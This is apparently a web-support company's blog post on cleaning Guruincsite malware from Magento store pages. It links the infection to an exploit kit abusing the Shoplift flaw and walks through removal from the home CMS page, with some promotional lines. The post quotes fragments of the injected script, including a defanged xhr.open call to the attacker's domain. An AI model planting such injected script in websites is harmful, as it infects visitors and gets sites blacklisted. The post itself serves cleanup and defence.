Since 17th Oct, we’ve have been receiving website hack recovery requests from Magento shops infected with Guruincsite,com malware.

There are two variations of the malicious code – one that has obfuscated code (gibberish) containing function LCWEHH(XHFER1){XHFER1=XHFER1 , and another that shows xhr.open('GET', 'http;//guruincsite,com/1,php' .

See how we secure your websites from malware!

Most of the hack recovery requests were from sites blacklisted by Google, and as of this writing, Google has listed 8527 domains infected with this malware.

Website owners reported seeing an alert “The site ahead contains malware” in browsers, see “Malicious software is hosted on 1 domain(s)” when clicking on Google search results, or got a mail from Google webmaster with the subject ” [Webmaster Tools] Malware infection detected“.

[Update 20th Oct] – It appears that this Guruincsite malware is inserted using the infamous Neutrino Exploit Kit which exploits the Shoplift vulnerability for which patches were released in Feb 2015. So, your best defense is to upgrade/patch Magento ASAP.

As part of our website support service, we’ve been able to clean this malware in a majority of the sites within 2 hours and got Google to de-blacklist these sites within 4 hours. Here’s how we did it.

[ Want to secure your websites from hacks? Our website technicians will audit and protect your websites in no time. ]

Removing the Guruincsite malware and de-listing from Google

As of now, the malware is seen to infect the Home CMS Page and Footer.

Cleaning Magento site home page

The plain text malware is till now found in the home page content. It’ll look something like this:

To clean the malware, we edited the home page CMS by going to CMS >> Pages >> Home >> Content and deleted the malicious code as shown below: